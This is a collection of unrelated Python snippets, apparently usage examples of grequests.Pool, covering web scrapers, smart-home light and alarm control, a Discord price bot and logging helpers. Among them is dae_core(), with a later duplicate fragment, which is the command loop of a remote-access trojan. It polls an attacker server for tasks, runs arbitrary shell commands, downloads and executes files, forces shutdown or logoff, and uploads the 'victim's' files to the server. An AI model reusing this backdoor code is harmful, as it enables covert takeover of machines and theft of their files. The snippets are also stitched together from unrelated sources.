def quote_extract():
    """Scrape Goodreads quote hyperlinks from each page in ``links`` and store them."""
    processed = 0
    tick = 0
    # Initialise grequests: fetch the pages one at a time through a 1-slot pool.
    pending = (grequests.get(link) for link in links)
    pages = grequests.imap(pending, grequests.Pool(1))

    def store(quotes):
        # Persist the hyperlink, read back the row id it was given, then commit.
        cur.execute(
            '''INSERT or REPLACE INTO Quote_link (quote_link) VALUES ( ? )''',
            (quotes, ))
        cur.execute('SELECT id FROM Quote_link WHERE quote_link = ?',
                    (quotes, ))
        quote_link_id = cur.fetchone()[0]
        conn.commit()

    quote_href = re.compile("^/work/quotes")
    for page in pages:
        parsed = BeautifulSoup(page.text, 'lxml')
        for anchor in parsed.find_all('a', class_='actionLink',
                                      attrs={'href': quote_href}):
            processed += 1
            progress = str(round((processed / book_n) * 100, 1))
            tick += 1
            # Print a progress line on every third quote found.
            if tick == 3:
                print("Currently at %", progress, "completion.")
                tick = 0
            store(anchor.get('href'))
def trainingCost():
    """Fetch every training listing, compute its cost-per-training point and
    report the cheapest one.

    Side effects: prints a per-listing summary line, the cheapest option and
    the elapsed wall-clock time. Reads the module-level ``trainingLinks``.
    """
    start_time = time.time()
    # BUG FIX: keep the costs as numbers. The original stored str(cost) and
    # min() then compared lexicographically (e.g. "10.0" < "9.0" is True).
    cost_values = []
    summaries = []
    reqs = (grequests.get(link) for link in trainingLinks)
    resp = grequests.imap(reqs, grequests.Pool(20))
    for r in resp:
        soup = BeautifulSoup(r.text, 'lxml')
        ovr = textCleaner(
            soup.find("div", class_="list-info-player__ovr").span.text)
        ratingPrice = round(
            priceCleaner(
                soup.find("div", class_="player-listing__price-value").text))
        trainingCostValue = ratingPrice / qsCheck(float(ovr))
        trainingCostValue = round(trainingCostValue, 2)
        cost_values.append(trainingCostValue)
        summaries.append(
            ("[Rated: " + str(ovr) + "]" + "[Buying at: " + str(ratingPrice) +
             "]" + "[C/T: " + str(trainingCostValue) + "]"))
    CheapestPriceIndex = cost_values.index(min(cost_values))
    print("....Here you are: ")
    print("\n".join(summaries))
    print("The cheapest option is this: \n")
    # BUG FIX: index with the cheapest index directly. The original printed
    # priceArray[20 - index], which points at the wrong entry and raises
    # IndexError whenever the cheapest listing is the first one (index 0).
    print(summaries[CheapestPriceIndex])
    totalTime = time.time() - start_time
    print("--- %s seconds ---" % (round(totalTime, 2)))
def send_alarm_on():
    """Tell the alarm endpoint to switch ON, unless that was the last state sent."""
    global last_sent_status_was_on
    if last_sent_status_was_on:
        # Already on — avoid hammering the device with duplicate requests.
        return
    print("Alarm ON")
    _ = grequests.send(grequests.get(f"https://{IP}/on"), grequests.Pool(1))
    last_sent_status_was_on = True
def quote_extract(links):
    """Walk each page in *links*, pull the Goodreads quote hrefs and store them.

    Opens grequests over the link list, finds the quote-hyperlink anchors on
    each consecutive page and commits each href to the Quote_link table.
    """
    seen = 0
    beat = 0
    # Initialise grequests: serial fetches through a single-slot pool.
    pages = grequests.imap((grequests.get(link) for link in links),
                           grequests.Pool(1))
    href_filter = re.compile("^/work/quotes")
    for page in pages:
        soup = BeautifulSoup(page.text, 'lxml')
        for tag in soup.find_all('a', class_='actionLink',
                                 attrs={'href': href_filter}):
            quotes = tag.get('href')
            seen += 1
            progress = str(round((seen / book_n) * 100, 1))
            beat += 1
            # Report progress on every quote (ticker threshold is 1 here).
            if beat == 1:
                print("Currently at %", progress, "completion.")
                beat = 0

            def commit():
                # Store the href, read back its row id, then commit.
                cur.execute(
                    '''INSERT or REPLACE INTO Quote_link (quote_link) VALUES ( ? )''',
                    (quotes, ))
                cur.execute('SELECT id FROM Quote_link WHERE quote_link = ?',
                            (quotes, ))
                quote_link_id = cur.fetchone()[0]
                conn.commit()

            commit()
def send_alarm_off():
    """Tell the alarm endpoint to switch OFF, unless that was the last state sent."""
    global last_sent_status_was_on
    if not last_sent_status_was_on:
        # Already off — nothing to do.
        return
    print("Alarm OFF")
    _ = grequests.send(grequests.get(f"https://{IP}/off"), grequests.Pool(1))
    last_sent_status_was_on = False
def createPoint(x, y):
    """POST a single (x, y) point to the sconce jobs API without blocking."""
    payload = {'x': x, 'y': y}
    request = grequests.post('http://api.sconce.dev/jobs/1/points.json',
                             data=payload)
    # Fire-and-forget through a pool; the greenlet result is not awaited.
    grequests.send(request, grequests.Pool(10))
def log_extra_data(self, params, campaign, request, to_phone, call_index): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Extra Data log call complete: %s" % res ip = hashlib.sha256(request.values.get("ip_address", "")).hexdigest() user_phone = params.get('userPhone', None) org = params.get('org', 'fftf') if not user_phone: user_phone = request.values.get('From', '+15555555555')[-10:] data = { 'key': self.api_key, 'campaign_id': campaign['id'], 'from_phone_number': string.replace(user_phone, "-", ""), 'to_phone_number': string.replace(to_phone, "-", ""), 'ip_address': ip, 'call_index': call_index, 'org': org } if self.debug_mode: print "FFTF Log Extra Data sending: %s" % data url = 'https://queue.fightforthefuture.org/log_phone_call' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def _handle_requests(
    self,
    tasks: Iterable[AzureLogRecord],
    stream: bool = False,
    exception_handler: Callable = None,
    gtimeout: Optional[int] = None,
) -> None:
    """Send every record's log request concurrently and attach the responses.

    :param tasks: a collection of AzureLogRecord objects.
    :param stream: If True, the content will not be downloaded immediately.
    :param exception_handler: callback invoked as (request, exception) for
        requests that carry an ``exception`` attribute; its return value is
        stored as the record's ``log_response``.
    :param gtimeout: gevent joinall timeout in seconds (unrelated to the
        per-request timeout).
    """
    records = list(tasks)
    pool = grequests.Pool(self._configuration.max_concurrent_requests)
    jobs = []
    for record in records:
        jobs.append(grequests.send(record.log_request, pool, stream=stream))
    # Wait for all greenlets (bounded by gtimeout) before inspecting results.
    grequests.gevent.joinall(jobs, timeout=gtimeout)
    for record in records:
        sent = record.log_request
        if sent.response is not None:
            record.log_response = sent.response
        elif exception_handler and hasattr(sent, "exception"):
            record.log_response = exception_handler(sent, sent.exception)
        else:
            record.log_response = None
def map(requests, stream=False, size=None, exception_handler=None,
        gtimeout=None, success_handler=None):
    """Concurrently convert a collection of Requests into Responses.

    :param requests: a collection of Request objects.
    :param stream: If True, the content will not be downloaded immediately.
    :param size: number of requests in flight at a time; None means unthrottled.
    :param exception_handler: callback (request, exception) for failed requests.
    :param gtimeout: gevent joinall timeout in seconds (unrelated to the
        per-request timeout).
    :param success_handler: callback (request) invoked for each success.
    :return: list of responses / handler results, aligned with *requests*.
    """
    sent = list(requests)
    pool = None
    if size:
        pool = grequests.Pool(size)
    jobs = []
    for req in sent:
        jobs.append(grequests.send(req, pool, stream=stream))
    grequests.gevent.joinall(jobs, timeout=gtimeout)
    results = []
    for req in sent:
        if req.response is not None:
            results.append(req.response)
            if success_handler:
                success_handler(req)
        elif exception_handler and hasattr(req, 'exception'):
            results.append(exception_handler(req, req.exception))
        else:
            results.append(None)
    return results
def tools_send_door_state(self):
    """Push the current door state to Jeedom through its HTTP command API."""
    print("Updating Jeedom")
    jeedom = self.CONF["JEEDOM"]
    # Substitute the API key and the command id for the current door state
    # into the URL template before building the full endpoint.
    api_path = jeedom["API_URL"].replace(
        "{key}", jeedom["API_KEY"]).replace(
        "{id}", jeedom["CMD_ID"][self.door_state])
    url = "%s%s%s" % (jeedom["PROTOCOL"], jeedom["HOST"], api_path)
    grequests.send(grequests.get(url), grequests.Pool(1))
def get_txt(links):
    """Fetch each article page in *links* and append its paragraph text to test.txt."""
    # Build the request set and fetch up to five pages concurrently.
    pending = (grequests.get(link) for link in links)
    for page in grequests.imap(pending, grequests.Pool(5)):
        page.encoding = 'utf-8'
        # Parse the HTML source and pull every text node under the article body.
        tree = etree.HTML(page.content)
        paragraphs = tree.xpath('//div[@id="article-content-inner"]/p//text()')
        print(paragraphs)
        with open("test.txt", "a", encoding='utf8') as sink:
            sink.writelines(paragraphs)
def turnLightOff(self, deviceId):
    """Ask the Hue hub to switch the given light off (non-blocking)."""
    # grequests fires the request as soon as send() is called; the main update
    # loop yields to the greenlet periodically so the result gets captured.
    url = 'http://{ip}/api/{username}/lights/{devId}/state'.format(
        ip=hub['IP'], username=hub['username'], devId=deviceId)
    request = grequests.put(url,
                            callback=printStatus,
                            data='{"on":false}',
                            timeout=4)
    greenlet = grequests.send(request, grequests.Pool(1))
    greenlet.link_exception(lambda *kwargs: sys.stdout.write(
        "There was an exception with the Hue request"))
def turnLightOff(self, deviceId):
    """Send the Insteon hub the off command for *deviceId* (non-blocking)."""
    # grequests fires the request as soon as send() is called; the main update
    # loop yields to the greenlet periodically so the result gets captured.
    credentials = '%s:%s' % (hub['username'], hub['password'])
    base64string = base64.encodestring(credentials).replace('\n', '')
    url = 'http://{ip}/3?0262{devId}0F13FF=I=3'.format(ip=hub['IP'],
                                                       devId=deviceId)
    request = grequests.get(url,
                            callback=printStatus,
                            timeout=4,
                            headers={"Authorization": "Basic %s" % base64string})
    greenlet = grequests.send(request, grequests.Pool(1))
    greenlet.link_exception(lambda *kwargs: sys.stdout.write(
        "There was an exception with the Insteon request"))
def async_request(handler_name):
    """Kick off a runLambda call for *handler_name* and count it as outstanding."""
    global outstanding
    url = 'http://%s:8080/runLambda/%s' % (config['host'], handler_name)
    body = json.dumps({"name": "Alice"})
    request = grequests.post(url,
                             headers=HEADERS,
                             data=body,
                             hooks=dict(response=async_response))
    grequests.send(request, grequests.Pool(1))
    # Track in-flight requests under the lock; async_response decrements.
    with async_lock:
        outstanding += 1
    return
def append_comments(parent):
    """Fetch every child comment of *parent* concurrently and attach them in place."""
    if "kids" not in parent:
        # Leaf item — nothing to fetch.
        return
    pool = grequests.Pool(100)
    for position, kid_id in enumerate(parent["kids"]):
        kid_url = "{}{}.json".format(api_item_url, kid_id)
        # The response hook slots each comment into its position under parent.
        hooks = {"response": append_decorator(append_comment, parent, position)}
        grequests.send(grequests.get(kid_url, hooks=hooks), pool)
    # Block until every child request has completed.
    pool.join()
def scrap_unis_page(lst_url):
    """Scrape the contact page of every university URL in *lst_url*.

    :return: per-university info rows, restored to the input-list order.
    """
    collected = []
    pages = grequests.imap((grequests.get(link) for link in lst_url),
                           grequests.Pool(20))
    for page in pages:
        try:
            soup = BeautifulSoup(page.text, 'lxml')
            details = scrap_uni_contact(soup)
            # NOTE(review): url[:4] + url[5:] drops the 5th character of the
            # response URL (presumably the "s" of "https") so it matches the
            # original list entry — confirm against how lst_url is built.
            position = lst_url.index(page.url[:4] + page.url[5:])
            collected.append([position, page.url] + details[:7] + details[8:])
        except Exception as e:
            print("Unexpected output : {}".format(e), file=sys.stderr)
    # Sort by the leading position index, then strip it off.
    collected.sort()
    return [entry[1:] for entry in collected]
def test_fetch_cards_sending_requests_by_batches_not_blocking_for_responses():
    """
    Send requests but don't block for the response. Use a request pool to keep
    a threshold of maximum number of requests. Use a callback to get notified
    of the response.
    """
    pool = grequests.Pool(30)
    for cardname in CARDS:
        card_url = mtgurl.make_vanilla_url(cardname)
        head_request = grequests.head(card_url,
                                      allow_redirects=True,
                                      callback=_on_response)
        grequests.send(head_request, pool)
    # Don't exit until we received the responses, otherwise we may lose some of them
    import time
    time.sleep(20)
def scrap_papers_page(papers_url, add):
    """Scrape every paper page, grouped per university.

    :param papers_url: iterable of per-university collections of paper URLs.
    :param add: offset added to the university index when tagging each paper.
    :return: flat list of per-paper info rows across all universities.
    """
    all_papers = []
    for (i, papers) in enumerate(papers_url):
        reqs_papers = (grequests.get(link) for link in papers)
        resp_papers = grequests.imap(reqs_papers, grequests.Pool(20))
        for r in resp_papers:
            try:
                soup = BeautifulSoup(r.text, 'lxml')
                infos_paper = scrap_paper_page(r.url, str(i + add + 1), soup)
                # Idiom fix: identity comparison with None (was "== None").
                if infos_paper is None:
                    continue
                # Idiom fix: extend() replaces the manual append loop.
                all_papers.extend(infos_paper)
            except Exception as e:
                print("Unexpected output : {}".format(e), file=sys.stderr)
    # TODO -> populate db with papers_info
    return all_papers
def get_player_rsp(player_urls): player_rsp_pool = grequests.Pool(len(player_urls)) for player_url in player_urls: player_url = player_url.strip() # remove the newline at the end # fetch player_id for this guy player_id = re.findall(r'\d+', player_url)[0] # fetch RSP using sale URL sale_url = "http://hitwicket.com/player/sell/{0}".format(player_id) req = grequests.get( sale_url, headers=headers, cookies=cookies, hooks={'response': [parse_rsp_factory(player_url=player_url)]}) grequests.send(req, player_rsp_pool) print "waiting for responses for 5 seconds..." time.sleep(5) return player_rsp
async def on_message(message):
    """Discord handler: on "$price", report cost-per-training for each listing
    and the cheapest option.

    Ignores the bot's own messages; everything else is posted back to the
    originating channel.
    """
    if message.author == client.user:
        return
    if message.content.startswith('$price'):
        summaries = []
        # BUG FIX: keep the costs as numbers. The original stored str(cost)
        # and min() then compared lexicographically (e.g. "10.0" < "9.0").
        cost_values = []
        start_time = time.time()
        await message.channel.send("Please wait...")
        reqs = (grequests.get(link) for link in trainingLinks)
        resp = grequests.imap(reqs, grequests.Pool(20))
        for r in resp:
            soup = BeautifulSoup(r.text, 'lxml')
            ovr = textCleaner(
                soup.find("div", class_="list-info-player__ovr").span.text)
            ratingPrice = round(
                priceCleaner(
                    soup.find("div",
                              class_="player-listing__price-value").text))
            trainingCostValueW = ratingPrice / qsCheck(float(ovr))
            trainingCostValue = round(trainingCostValueW, 2)
            cost_values.append(trainingCostValueW)
            summaries.append(("[Rated: " + str(ovr) + "]" + "[Buying at: " +
                              str(ratingPrice) + "]" + "[C/T: " +
                              str(trainingCostValue) + "]"))
        CheapestPriceIndex = cost_values.index(min(cost_values))
        await message.channel.send("....Here you are: ")
        await message.channel.send("\n".join(summaries))
        await message.channel.send("The cheapest option is this: \n")
        # BUG FIX: index with the cheapest index directly. The original sent
        # priceArray[20 - index], which points at the wrong entry and raises
        # IndexError when the cheapest listing is first (index 0).
        await message.channel.send(summaries[CheapestPriceIndex])
        totalTime = time.time() - start_time
        await message.channel.send("--- %s seconds ---" %
                                   (round(totalTime, 2)))
def get_async_web_response(url, method='GET', params=None, headers=None,
                           encode=False, verify=None, use_verify=False,
                           callback=None):
    """Send a request asynchronously and return the grequests send job.

    :param url: target URL.
    :param method: 'POST' posts *params* as form data; anything else GETs.
    :param params: form data forwarded as the request body.
    :param headers: optional request headers.
    :param encode: unused; kept for interface compatibility.
    :param verify: TLS verification value, forwarded only when *use_verify*
        is True on the POST path.
    :param use_verify: whether to pass *verify* through (POST only).
    :param callback: grequests response callback.
    :return: the greenlet returned by grequests.send, or None on any failure.
    """
    import grequests
    response = None
    try:
        if 'POST' == method:
            if use_verify:
                request = grequests.post(url,
                                         data=params,
                                         headers=headers,
                                         verify=verify,
                                         callback=callback)
            else:
                request = grequests.post(url,
                                         data=params,
                                         headers=headers,
                                         callback=callback)
        else:
            # BUG FIX: the GET branch called requests.get with a "callback"
            # kwarg, which requests does not accept (TypeError, silently
            # swallowed below, so every GET returned None). Route it through
            # grequests like the POST branch.
            request = grequests.get(url,
                                    data=params,
                                    headers=headers,
                                    callback=callback)
        if request:
            response = grequests.send(request, grequests.Pool(1))
        return response
    except Exception:
        # Best-effort by design: report "no response" on any failure. Narrowed
        # from a bare "except:" so KeyboardInterrupt/SystemExit still propagate.
        return response
def post_to_leaderboard(self, fftf_campaign, stat, data, host, session): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Leaderboard call complete: %s" % res data = { 'campaign': fftf_campaign, 'stat': stat, 'data': data, 'host': host, 'session': session } if self.debug_mode: print "FFTF Leaderboard sending: %s" % data url = 'https://leaderboard.fightforthefuture.org/log' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def __init__(self, intent_callback, error_callback, access_token):
    """Set up the interpreter: callbacks, a Wit access token and a request pool.

    :param intent_callback: forwarded to the parent interpreter.
    :param error_callback: forwarded to the parent interpreter.
    :param access_token: Wit.ai API token; must be non-empty.
    """
    self.__log_level = _LOG_LEVEL
    super(WitInterpreter, self).__init__(intent_callback, error_callback)
    # An empty token would silently break every Wit call, so fail fast here.
    assert access_token != ""
    self.access_token = access_token
    # Pool of 2 bounds how many Wit requests are in flight at once.
    self.request_pool = grequests.Pool(2)
def dae_core(): global working_directory1 global caesar_folder global delay handshake_req() no_response = 0 subprocesses = [] while 1: # Checking if some subprocess has terminated if subprocesses != []: non_terminated = [] for process in subprocesses: # If process has terminated: if process[0].poll() != None: out = process[0].stdout.read() err = process[0].stderr.read() output = err if err != '' else out command = process[1]['command'] task_id = process[1]['task_id'] working_directory1 = process[1]['wd'] r = requests.post (caesar_folder + '/target/output.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id, 'output': output, 'wd': quote(working_directory1)}) else: non_terminated.append (process) subprocesses = non_terminated non_terminated = [] # Check if there are new commands to execute r = requests.post (caesar_folder + '/target/tasks.php', data={'unique_id': unique_id}) response = r.text # If the response from the server is not empty if response != '': # Splitting the response in order to get a list of commands to execute (and their identifiers) commands = split_response (response, '<command>', '</command>') ids = split_response (response, '<task_id>', '</task_id>') # Executing all commands contained in the list for command, task_id in zip(commands, ids): # If the user want a remote pseudo-connection if command == 'connect': delay = 1 output = 'connected' elif command == 'exit': delay = 10 output = 'exit' elif command == 'help': shell_help_link = caesar_folder + '/shell_help.txt' help_result = requests.get(shell_help_link).text output = help_result elif command == 'shutdown': subprocess.call('shutdown -s -t 5 -f',shell=True) output = '[*] Target PC Will Shutdown in 5 sec.' elif command == 'restart': subprocess.call('shutdown -r',shell=True) output = '[*] Target PC will restart in 5 sec.' elif command == 'logoff': subprocess.call('shutdown -l',shell=True) output = '[*] Target PC Will Log Off in 5 sec.' 
elif command.startswith('show.'): current_user = getpass.getuser() to_show = command.split('.') subprocess.call('msg ' + current_user + ' ' + to_show[1],shell=True) output = '[*] The massege will be shown to victim for 60 sec.' elif command.startswith('cd '): try: directory = command.replace('cd ', '') os.chdir(directory) working_directory1 = os.getcwd() output = '' except OSError as e: output = e.strerror + "\n" elif command.startswith('download_from_web '): link_to_down = command.split(' ') download_link = link_to_down[1] downloaded_file = download_file(download_link) output = '[*] ' + downloaded_file + ' Is Downloaded.' elif command.startswith('dae '): link_to_down = command.split(' ') download_link = link_to_down[1] downloaded_file = download_file(download_link) working_directory1 = os.getcwd() file_to_execute = working_directory1 + '\\' + downloaded_file subprocess.call(file_to_execute, shell=True) output = '[*] ' + file_to_execute + ' Is executed.' # If the attacker want the victim to upload a file to the remote server elif command.startswith('download '): filename = command.replace ('download ', '') if os.path.isfile(filename): files = {'file_to_upload': open(filename,'rb')} # Start the download without blocking the process r = grequests.post(caesar_folder + '/target/upload.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id}, files=files) job = grequests.send(r, grequests.Pool(1)) output = 'The file is being uploaded to the server' else: output = 'Inexistent file..' 
else: if os.name == 'nt': process = subprocess.Popen (command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) else: process = subprocess.Popen ([command], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, close_fds=True) # Time for the subprocess to spawn sleep (0.5) # If the execution of the process has terminated immediately if process.poll() != None: out = process.stdout.read() err = process.stderr.read() output = err if err != '' else out # Else add the process to the list of non-terminated subprocesses else: new_subprocess = [] # Appending to the list of subprocesses the instance of subprocess new_subprocess.append(process) # Appending to the list of subprocesses a dictionary containing metadata of the process new_subprocess.append({'command' : command, 'task_id' : task_id, 'wd' : working_directory1}.copy()) subprocesses.append(new_subprocess) output = 'executing' # Send the output to the server r = requests.post (caesar_folder + '/target/output.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id, 'output': output, 'wd': quote(working_directory1)}) sleep (delay) else: # If the attacker is running a pseudo-interactive shell and he's not issuing commands if (delay != 10): # Increment the number of no-responses no_response += 1 # If there are too many no-responses from the server reset the delay (close the interactive-shell) if no_response == 60: delay = 10 no_response = 0 sleep (delay)
def grequest_page(strings, index):
    """GET every URL in *strings* through a pool of size *index*.

    :return: the grequests.imap iterator over the responses.
    """
    pending = (grequests.get(string) for string in strings)
    return grequests.imap(pending, grequests.Pool(index))
# If the attacker want the victim to upload a file to the remote server elif command.startswith('download '): filename = command.replace('download ', '') if os.path.isfile(filename): files = {'file_to_upload': open(filename, 'rb')} # Start the download without blocking the process r = grequests.post(caesar_folder + '/target/upload.php', data={ 'unique_id': unique_id, 'command': command, 'task_id': task_id }, files=files) job = grequests.send(r, grequests.Pool(1)) output = 'The file is being uploaded to the server' else: output = 'Inexistent file..' else: if os.name == 'nt': process = subprocess.Popen(command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) else: process = subprocess.Popen([command],
def __init__(self, callback=None):
    """Wire up the response handler and a single-slot request pool.

    :param callback: optional replacement for the default response handler.
    """
    # Provide a way to change callback so we can change if needed. The best
    # example that comes to mind is in tests.
    self.buffer = callback or self.process_response
    # One request in flight at a time.
    self.pool = grequests.Pool(1)
def grequest_page(strings, index):
    """Fetch every URL in *strings* concurrently, *index* requests at a time.

    :return: the grequests.imap iterator yielding responses as they complete.
    """
    return grequests.imap((grequests.get(string) for string in strings),
                          grequests.Pool(index))
def crawlURL(self, url):
    """Fetch *url* asynchronously with a randomly chosen User-Agent header."""
    # Rotate the User-Agent per request to look less like a single bot.
    disguise = {'User-Agent': random.choice(UserAgents)}
    request = grequests.get(url,
                            headers=disguise,
                            hooks=dict(response=self.done_loading))
    grequests.send(request, grequests.Pool(1))
for a in soup.find_all('a'): if "last page" in str(a): a_text = a.text last_page = int(a_text.replace("[", "").replace("]", "")) # Build a list of URLs to scrape URLs = [] for i in range(2, last_page + 1): html_file = str(i) + ".html" if html_file not in scrapped: URLs.append("https://www.boardgamegeek.com/users/page/" + str(i) + "?country=&state=&city=") reqs = (grequests.get(link) for link in URLs) resp = grequests.imap(reqs, grequests.Pool(10)) for r in resp: url = r.url i = url.split("?")[0].split("/")[-1] soup = BeautifulSoup(r.text, "lxml") save_soup(soup, i) """ with ProcessPoolExecutor(max_workers=4) as executor: futures = [ executor.submit(download_and_save, url) for url in URLs ] results = 0 for result in as_completed(futures): results + 1 """ """ for i in range(2, last_page + 1): html_file = str(i) + ".html"